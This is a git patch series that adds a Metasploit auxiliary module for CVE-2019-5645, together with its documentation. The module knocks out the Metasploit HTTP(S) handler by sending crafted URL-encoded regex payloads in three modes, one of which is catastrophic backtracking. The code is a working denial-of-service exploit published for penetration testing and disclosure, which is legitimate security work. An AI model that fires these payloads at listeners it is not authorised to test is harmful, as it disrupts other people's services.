From d65775e5bf5cb5df93d753d3e2ea684235cc90a0 Mon Sep 17 00:00:00 2001 From: Jose Garduno Date: Wed, 9 Oct 2019 16:54:43 +0200 Subject: [PATCH 1/5] added metasploit http DoS module --- .../dos/http/metasploit_httphandler_dos.rb | 152 ++++++++++++++++++ 1 file changed, 152 insertions(+) create mode 100644 modules/auxiliary/dos/http/metasploit_httphandler_dos.rb diff --git a/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb b/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb new file mode 100644 index 000000000000..3fec42cadc1a --- /dev/null +++ b/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb @@ -0,0 +1,152 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Dos + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Metasploit HTTP(S) handler DoS', + 'Description' => %q{ + This module exploits the Metasploit HTTP(S) handler by sending + a specially crafted HTTP request that gets added as a resource handler. + Resources (which come from the external connections) are evaluated as RegEx + in the handler server. Specially crafted input can trigger Gentle, Soft and Hard DoS. + + GENTLE: *Current sessions will continue to work, but not future ones* + A lack of input sanitation permits an attacker to submit a + request that will be added to the resources and will be used as regex rule + it is possible then to make a valid regex rule that captures all the new handler + requests. The sessions that were established previously will continue to work. + + SOFT: *No past or future sessions will work* + A lack of input sanitation and lack of exception handling causes + metasploit to behave abnormally when looking an appropriate resource for the + request, by submitting an invalid regex as a resource. This means that no request, + current or future will get served an answer. + + HARD: *ReDOS or Catastrophic Regex Backtracking* + A lack of input sanitization on paths added as resources allows + an attacker to execute a catastrophic regex backtracking operation + causing a Denial of Service by CPU consumption. + + Tested against: + + Metasploit 5.0.20 + }, + 'Author' => [ + 'Jose Garduno, Dreamlab Technologies AG', #Vulnerability Discovery, Metasploit module. + 'Angelo Seiler, Dreamlab Technologies AG', #Additional research, debugging. + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['CVE', '2019-5645'] + ], + 'DisclosureDate' => '04 September 2019' + )) + + register_options( + [ + OptString.new('DOSTYPE', [true, 'GENTLE|SOFT|HARD', 'HARD']) + ]) + end + + def test_service_unresponsive + begin + print_status('Testing for service unresponsiveness.') + + res = send_request_cgi({ + 'uri' => '/' + Rex::Text.rand_text_alpha(8), + 'method' => 'GET' + }) + + if res.nil? + print_good('SUCCESS, Service not responding.') + else + print_error('Service responded with a valid HTTP Response; Attack failed.') + end + rescue ::Rex::ConnectionRefused + print_error('An unknown error occurred.') + rescue ::Timeout::Error + print_good('HTTP request timed out, most likely the ReDoS attack was successful.') + end + end + + + def dos + case datastore['DOSTYPE'] + when "HARD" + resone = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri("/%2f%26%28%21%7c%23%2b%29%2b%40%32%30") + ) + begin + restwo = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri("/%26%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%21") + ) + rescue ::Errno::EPIPE, ::Timeout::Error + # Same exceptions the HttpClient mixin catches + end + test_service_unresponsive + + when "SOFT" + resone = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri("/%5b20") + ) + + test_service_unresponsive + + when "GENTLE" + resone = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri("/%2e%2a%7c%32%30%7c%5c") + ) + + sleep(1) + + restwo = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri("/whatever") + ) + + resthree = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri("/whatever2") + ) + + if resthree.body.length == 0 + print_good('SUCCESS, Service not responding.') + else + print_error('Service responded with a valid HTTP Response; Attack failed.') + end + + else + bla = "" + end + + print_status("DOS request sent") + end + + def is_alive? + begin + connect + rescue Rex::ConnectionRefused + return false + ensure + disconnect + end + true + end + + def run + print_status("#{rhost}:#{rport} - Sending DoS packet...") + dos + + end + +end \ No newline at end of file From 8576a7876ad6a111550588b54cb58ab96e34eb33 Mon Sep 17 00:00:00 2001 From: p0 Date: Wed, 9 Oct 2019 21:53:47 +0200 Subject: [PATCH 2/5] changed disclosure date to ISO 8601 format --- modules/auxiliary/dos/http/metasploit_httphandler_dos.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb b/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb index 3fec42cadc1a..f5a6a91d8774 100644 --- a/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb +++ b/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb @@ -45,7 +45,7 @@ def initialize(info = {}) 'References' => [ ['CVE', '2019-5645'] ], - 'DisclosureDate' => '04 September 2019' + 'DisclosureDate' => '2019-09-04' )) register_options( @@ -149,4 +149,4 @@ def run end -end \ No newline at end of file +end From 3dac95ed32c19db164663b52953e25b5287a597f Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 26 Dec 2019 13:00:52 -0600 Subject: [PATCH 3/5] fix enumeration handling --- modules/auxiliary/dos/http/metasploit_httphandler_dos.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb b/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb index f5a6a91d8774..0a4a67cd898d 100644 --- a/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb +++ b/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb @@ -50,7 +50,7 @@ def initialize(info = {}) register_options( [ - OptString.new('DOSTYPE', [true, 'GENTLE|SOFT|HARD', 'HARD']) + OptEnum.new('DOSTYPE', [true, 'Type of DoS to trigger', 'HARD', %w[GENTLE SOFT HARD]]) ]) end @@ -126,7 +126,7 @@ def dos end else - bla = "" + fail_with Failure::BadConfig, 'Invalid DOSTYPE selected' end print_status("DOS request sent") @@ -146,7 +146,6 @@ def is_alive? def run print_status("#{rhost}:#{rport} - Sending DoS packet...") dos - end end From b177a8235ddb36bef3da16c2596166502444905b Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 26 Dec 2019 13:05:21 -0600 Subject: [PATCH 4/5] adjust indentation --- .../dos/http/metasploit_httphandler_dos.rb | 24 +++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb b/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb index 0a4a67cd898d..ce4f2496c5f5 100644 --- a/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb +++ b/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb @@ -9,8 +9,8 @@ class MetasploitModule < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Metasploit HTTP(S) handler DoS', - 'Description' => %q{ + 'Name' => 'Metasploit HTTP(S) handler DoS', + 'Description' => %q{ This module exploits the Metasploit HTTP(S) handler by sending a specially crafted HTTP request that gets added as a resource handler. Resources (which come from the external connections) are evaluated as RegEx @@ -37,16 +37,16 @@ def initialize(info = {}) Metasploit 5.0.20 }, - 'Author' => [ - 'Jose Garduno, Dreamlab Technologies AG', #Vulnerability Discovery, Metasploit module. - 'Angelo Seiler, Dreamlab Technologies AG', #Additional research, debugging. - ], - 'License' => MSF_LICENSE, - 'References' => [ - ['CVE', '2019-5645'] - ], - 'DisclosureDate' => '2019-09-04' - )) + 'Author' => [ + 'Jose Garduno, Dreamlab Technologies AG', #Vulnerability Discovery, Metasploit module. + 'Angelo Seiler, Dreamlab Technologies AG', #Additional research, debugging. + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['CVE', '2019-5645'] + ], + 'DisclosureDate' => '2019-09-04' + )) register_options( [ From d87f752591c710cd30527d851788f7d196c3904c Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 26 Dec 2019 13:31:38 -0600 Subject: [PATCH 5/5] add module docs --- .../dos/http/metasploit_httphandler_dos.md | 36 +++++++++++++++++++ .../dos/http/metasploit_httphandler_dos.rb | 21 +---------- 2 files changed, 37 insertions(+), 20 deletions(-) create mode 100644 documentation/modules/auxiliary/dos/http/metasploit_httphandler_dos.md diff --git a/documentation/modules/auxiliary/dos/http/metasploit_httphandler_dos.md b/documentation/modules/auxiliary/dos/http/metasploit_httphandler_dos.md new file mode 100644 index 000000000000..8f44caf777af --- /dev/null +++ b/documentation/modules/auxiliary/dos/http/metasploit_httphandler_dos.md @@ -0,0 +1,36 @@ +## Vulnerable Application + + Metasploit Framework before version 5.0.28 + +## Verification Steps + + 1. Install Metasploit 5.0.27 or earlier (or checkout before commit 5621d200ccf62e4a8f0dad80c1c74f4e0e52d86b) + 2. Start msfconsole with the target Metasploit instance and start any reverse_http/reverse_https listener + 3. Start this module and set RHOSTS and RPORT to the target listener address and port. + 4. Run the modulest ``` + 7. `msfconsole` should use 99%+ CPU for a varying amount of time depending on the DOSTYPE option. You may need to kill the process manually. + +## Options + + **DOSTYPE** + + GENTLE: *Current sessions will continue to work, but not future ones* + A lack of input sanitation permits an attacker to submit a request that will be added to the resources and will be used as regex rule it is possible then to make a valid regex rule that captures all the new handler requests. The sessions that were established previously will continue to work. + + SOFT: *No past or future sessions will work* + A lack of input sanitation and lack of exception handling causes Metasploit to behave abnormally when looking an appropriate resource for the request, by submitting an invalid regex as a resource. This means that no request, current or future will get served an answer. + + HARD: *ReDOS or Catastrophic Regex Backtracking* + A lack of input sanitization on paths added as resources allows an attacker to execute a catastrophic regex backtracking operation causing a Denial of Service by CPU consumption. + +## Scenarios + +``` +msf5 auxiliary(dos/http/metasploit_httphandler_dos) > run +[*] Running module against 127.0.0.1 + +[*] 127.0.0.1:8080 - Sending DoS packet... +^C[-] Stopping running againest current target... +[*] Control-C again to force quit all targets. +[*] Auxiliary module execution completed +``` diff --git a/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb b/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb index ce4f2496c5f5..88dc90926703 100644 --- a/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb +++ b/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb @@ -16,26 +16,7 @@ def initialize(info = {}) Resources (which come from the external connections) are evaluated as RegEx in the handler server. Specially crafted input can trigger Gentle, Soft and Hard DoS. - GENTLE: *Current sessions will continue to work, but not future ones* - A lack of input sanitation permits an attacker to submit a - request that will be added to the resources and will be used as regex rule - it is possible then to make a valid regex rule that captures all the new handler - requests. The sessions that were established previously will continue to work. - - SOFT: *No past or future sessions will work* - A lack of input sanitation and lack of exception handling causes - metasploit to behave abnormally when looking an appropriate resource for the - request, by submitting an invalid regex as a resource. This means that no request, - current or future will get served an answer. - - HARD: *ReDOS or Catastrophic Regex Backtracking* - A lack of input sanitization on paths added as resources allows - an attacker to execute a catastrophic regex backtracking operation - causing a Denial of Service by CPU consumption. - - Tested against: - - Metasploit 5.0.20 + Tested against Metasploit 5.0.20. }, 'Author' => [ 'Jose Garduno, Dreamlab Technologies AG', #Vulnerability Discovery, Metasploit module.